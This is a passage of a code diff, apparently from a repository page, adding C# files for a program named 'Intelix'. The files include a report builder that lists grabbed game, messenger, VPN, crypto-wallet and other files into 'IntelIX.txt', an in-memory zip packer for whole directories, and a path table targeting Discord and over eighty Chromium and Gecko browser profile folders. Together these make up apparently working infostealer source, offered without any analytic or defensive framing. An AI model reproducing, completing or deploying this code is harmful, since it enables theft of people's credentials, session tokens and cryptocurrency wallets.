foreach (string item3 in game.Files.Reverse())
|
||||
{
|
||||
list.Add(" - " + item3);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (Messangers.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Messangers] [--{0}--] [{1}]", Messangers.Count(), string.Join(", ", Messangers.Select((CounterApplications b) => b.Name).ToArray())));
|
||||
foreach (CounterApplications messanger in Messangers)
|
||||
{
|
||||
list.Add(" [Name " + messanger.Name + "]");
|
||||
foreach (string item4 in messanger.Files.Reverse())
|
||||
{
|
||||
list.Add(" - " + item4);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (Vpns.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Vpns] [--{0}--] [{1}]", Vpns.Count(), string.Join(", ", Vpns.Select((CounterApplications b) => b.Name).ToArray())));
|
||||
foreach (CounterApplications vpn in Vpns)
|
||||
{
|
||||
list.Add(" [Name " + vpn.Name + "]");
|
||||
foreach (string item5 in vpn.Files.Reverse())
|
||||
{
|
||||
list.Add(" - " + item5);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (CryptoChromium.Count() > 0)
|
||||
{
|
||||
list.Add($"[CryptoChromium] [--{CryptoChromium.Count()}--]");
|
||||
foreach (string item6 in CryptoChromium)
|
||||
{
|
||||
list.Add(" - " + item6);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (CryptoDesktop.Count() > 0)
|
||||
{
|
||||
list.Add($"[CryptoDesktop] [--{CryptoDesktop.Count()}--]");
|
||||
foreach (string item7 in CryptoDesktop)
|
||||
{
|
||||
list.Add(" - " + item7);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (FilesGrabber.Count() > 0)
|
||||
{
|
||||
list.Add($"[FilesGrabber] [--{FilesGrabber.Count()}--]");
|
||||
foreach (string item8 in FilesGrabber)
|
||||
{
|
||||
list.Add(" - " + item8);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
zip.AddTextFile("IntelIX.txt", string.Join("\n", list));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,124 @@
|
||||
using System;
|
||||
using System.Collections.Concurrent;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.IO.Compression;
|
||||
using System.Text;
|
||||
|
||||
namespace Intelix.Helper.Data;
|
||||
|
||||
public sealed class InMemoryZip : IDisposable
|
||||
{
|
||||
private readonly ConcurrentDictionary<string, byte[]> _entries = new ConcurrentDictionary<string, byte[]>(StringComparer.OrdinalIgnoreCase);
|
||||
|
||||
private readonly object _buildLock = new object();
|
||||
|
||||
private bool _disposed;
|
||||
|
||||
public int Count => _entries.Count;
|
||||
|
||||
private static string NormalizeEntryName(string name)
|
||||
{
|
||||
if (string.IsNullOrWhiteSpace(name))
|
||||
{
|
||||
throw new ArgumentException("Entry name is null or empty", "name");
|
||||
}
|
||||
name = name.Replace('\\', '/').Trim('/');
|
||||
if (name.Length != 0)
|
||||
{
|
||||
return name;
|
||||
}
|
||||
throw new ArgumentException("Invalid entry name", "name");
|
||||
}
|
||||
|
||||
public void AddFile(string entryPath, byte[] content)
|
||||
{
|
||||
if (_disposed)
|
||||
{
|
||||
throw new ObjectDisposedException("InMemoryZip");
|
||||
}
|
||||
if (content != null && content.Length != 0)
|
||||
{
|
||||
string key = NormalizeEntryName(entryPath);
|
||||
byte[] copy = new byte[content.Length];
|
||||
Buffer.BlockCopy(content, 0, copy, 0, content.Length);
|
||||
_entries.AddOrUpdate(key, copy, (string text, byte[] old) => copy);
|
||||
}
|
||||
}
|
||||
|
||||
public void AddTextFile(string entryPath, string text)
|
||||
{
|
||||
if (!string.IsNullOrEmpty(text))
|
||||
{
|
||||
AddFile(entryPath, Encoding.UTF8.GetBytes(text));
|
||||
}
|
||||
}
|
||||
|
||||
public void AddDirectoryFiles(string sourceDirectory, string targetEntryDirectory = "", bool recursive = true)
|
||||
{
|
||||
if (_disposed)
|
||||
{
|
||||
throw new ObjectDisposedException("InMemoryZip");
|
||||
}
|
||||
if (string.IsNullOrEmpty(sourceDirectory))
|
||||
{
|
||||
throw new ArgumentException("sourceDirectory");
|
||||
}
|
||||
if (!Directory.Exists(sourceDirectory))
|
||||
{
|
||||
return;
|
||||
}
|
||||
SearchOption searchOption = (recursive ? SearchOption.AllDirectories : SearchOption.TopDirectoryOnly);
|
||||
string[] files = Directory.GetFiles(sourceDirectory, "*", searchOption);
|
||||
foreach (string text in files)
|
||||
{
|
||||
string text2 = text.Substring(sourceDirectory.Length).TrimStart(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar);
|
||||
string text3 = (string.IsNullOrEmpty(targetEntryDirectory) ? text2 : Path.Combine(targetEntryDirectory, text2));
|
||||
text3 = text3.Replace('\\', '/');
|
||||
try
|
||||
{
|
||||
byte[] content = File.ReadAllBytes(text);
|
||||
AddFile(text3, content);
|
||||
}
|
||||
catch
|
||||
{
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public byte[] ToArray(CompressionLevel compression = CompressionLevel.Fastest)
|
||||
{
|
||||
if (_disposed)
|
||||
{
|
||||
throw new ObjectDisposedException("InMemoryZip");
|
||||
}
|
||||
lock (_buildLock)
|
||||
{
|
||||
using MemoryStream memoryStream = new MemoryStream();
|
||||
using (ZipArchive zipArchive = new ZipArchive(memoryStream, ZipArchiveMode.Create, leaveOpen: true, Encoding.UTF8))
|
||||
{
|
||||
foreach (KeyValuePair<string, byte[]> entry in _entries)
|
||||
{
|
||||
using Stream stream = zipArchive.CreateEntry(entry.Key, compression).Open();
|
||||
byte[] value = entry.Value;
|
||||
stream.Write(value, 0, value.Length);
|
||||
}
|
||||
}
|
||||
return memoryStream.ToArray();
|
||||
}
|
||||
}
|
||||
|
||||
public void Clear()
|
||||
{
|
||||
_entries.Clear();
|
||||
}
|
||||
|
||||
public void Dispose()
|
||||
{
|
||||
if (!_disposed)
|
||||
{
|
||||
_disposed = true;
|
||||
_entries.Clear();
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,121 @@
|
||||
using System;
|
||||
using System.IO;
|
||||
|
||||
namespace Intelix.Helper.Data;
|
||||
|
||||
public static class Paths
|
||||
{
|
||||
public static string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
|
||||
|
||||
public static string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
|
||||
|
||||
public static string[] Discord = new string[4]
|
||||
{
|
||||
appdata + "\\discord",
|
||||
appdata + "\\discordcanary",
|
||||
appdata + "\\Lightcord",
|
||||
appdata + "\\discordptb"
|
||||
};
|
||||
|
||||
public static string[] Chromium = new string[66]
|
||||
{
|
||||
appdata + "\\Lulumi-browser",
|
||||
appdata + "\\kingpinbrowser",
|
||||
appdata + "\\Falkon\\Profiles",
|
||||
appdata + "\\Hola\\chromium_profile",
|
||||
appdata + "\\Opera Software\\Opera Stable",
|
||||
appdata + "\\Opera Software\\Opera GX Stable",
|
||||
localappdata + "\\Battle.net",
|
||||
localappdata + "\\GhostBrowser",
|
||||
localappdata + "\\ColibriBrowser",
|
||||
localappdata + "\\Min\\User Data",
|
||||
localappdata + "\\Coowon\\Coowon",
|
||||
localappdata + "\\Uran\\User Data",
|
||||
localappdata + "\\Kinza\\User Data",
|
||||
localappdata + "\\Blisk\\User Data",
|
||||
localappdata + "\\Xvast\\User Data",
|
||||
localappdata + "\\Torch\\User Data",
|
||||
localappdata + "\\CryptoTab Browser",
|
||||
localappdata + "\\Comodo\\User Data",
|
||||
localappdata + "\\Kometa\\User Data",
|
||||
localappdata + "\\liebao\\User Data",
|
||||
localappdata + "\\Chedot\\User Data",
|
||||
localappdata + "\\K-Melon\\User Data",
|
||||
localappdata + "\\Orbitum\\User Data",
|
||||
localappdata + "\\Vivaldi\\User Data",
|
||||
localappdata + "\\Slimjet\\User Data",
|
||||
localappdata + "\\Iridium\\User Data",
|
||||
localappdata + "\\Maxthon\\User Data",
|
||||
localappdata + "\\Maxthon3\\User Data",
|
||||
localappdata + "\\Nichrome\\User Data",
|
||||
localappdata + "\\Chromodo\\User Data",
|
||||
localappdata + "\\QIP Surf\\User Data",
|
||||
localappdata + "\\Chromium\\User Data",
|
||||
localappdata + "\\BitTorrent\\Maelstrom",
|
||||
localappdata + "\\Globus VPN\\User Data",
|
||||
localappdata + "\\CentBrowser\\User Data",
|
||||
localappdata + "\\Amigo\\User\\User Data",
|
||||
localappdata + "\\MapleStudio\\ChromePlus",
|
||||
localappdata + "\\7Star\\7Star\\User Data",
|
||||
localappdata + "\\Mail.Ru\\Atom\\User Data",
|
||||
localappdata + "\\Comodo\\Dragon\\User Data",
|
||||
localappdata + "\\UCBrowser\\User Data_i18n",
|
||||
localappdata + "\\Google\\Chrome\\User Data",
|
||||
localappdata + "\\Coowon\\Coowon\\User Data",
|
||||
localappdata + "\\CocCoc\\Browser\\User Data",
|
||||
localappdata + "\\AOL\\AOL Shield\\User Data",
|
||||
localappdata + "\\Microsoft\\Edge\\User Data",
|
||||
localappdata + "\\uCozMedia\\Uran\\User Data",
|
||||
localappdata + "\\Element Browser\\User Data",
|
||||
localappdata + "\\Sputnik\\Sputnik\\User Data",
|
||||
localappdata + "\\Elements Browser\\User Data",
|
||||
localappdata + "\\CCleaner Browser\\User Data",
|
||||
localappdata + "\\360Chrome\\Chrome\\User Data",
|
||||
localappdata + "\\Tencent\\QQBrowser\\User Data",
|
||||
localappdata + "\\Naver\\Naver Whale\\User Data",
|
||||
localappdata + "\\Baidu\\BaiduBrowser\\User Data",
|
||||
localappdata + "\\360Browser\\Browser\\User Data",
|
||||
localappdata + "\\Google(x86)\\Chrome\\User Data",
|
||||
localappdata + "\\Epic Privacy Browser\\User Data",
|
||||
localappdata + "\\CatalinaGroup\\Citrio\\User Data",
|
||||
localappdata + "\\Yandex\\YandexBrowser\\User Data",
|
||||
localappdata + "\\MapleStudio\\ChromePlus\\User Data",
|
||||
localappdata + "\\AVAST Software\\Browser\\User Data",
|
||||
localappdata + "\\BraveSoftware\\Brave-Browser\\User Data",
|
||||
localappdata + "\\NVIDIA Corporation\\NVIDIA GeForce Experience",
|
||||
localappdata + "\\BraveSoftware\\Brave-Browser-Nightly\\User Data",
|
||||
localappdata + "\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer"
|
||||
};
|
||||
|
||||
public static string[] Gecko = new string[18]
|
||||
{
|
||||
appdata + "\\Mozilla\\Firefox\\Profiles",
|
||||
appdata + "\\Waterfox\\Profiles",
|
||||
appdata + "\\K-Meleon\\Profiles",
|
||||
appdata + "\\Thunderbird\\Profiles",
|
||||
appdata + "\\Comodo\\IceDragon\\Profiles",
|
||||
appdata + "\\8pecxstudios\\Cyberfox\\Profiles",
|
||||
appdata + "\\NETGATE Technologies\\BlackHaw\\Profiles",
|
||||
appdata + "\\Moonchild Productions\\Pale Moon\\Profiles",
|
||||
appdata + "\\Ghostery Browser\\Profiles",
|
||||
appdata + "\\Undetectable\\Profiles",
|
||||
appdata + "\\Sielo\\profiles",
|
||||
appdata + "\\Waterfox\\Profiles",
|
||||
appdata + "\\conkeror.mozdev.org\\conkeror\\Profiles",
|
||||
appdata + "\\Netscape\\Navigator\\Profiles",
|
||||
appdata + "\\Mozilla\\SeaMonkey\\Profiles",
|
||||
appdata + "\\FlashPeak\\SlimBrowser\\Profiles",
|
||||
appdata + "\\Avant Profiles",
|
||||
appdata + "\\Flock\\Profiles"
|
||||
};
|
||||
|
||||
public static string GetBrowserName(string path)
|
||||
{
|
||||
string[] array = path.Split(Path.DirectorySeparatorChar);
|
||||
if (path.Contains("Opera"))
|
||||
{
|
||||
return array[6].Replace(" Stable", "");
|
||||
}
|
||||
return array[5];
|
||||
}
|
||||
}
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user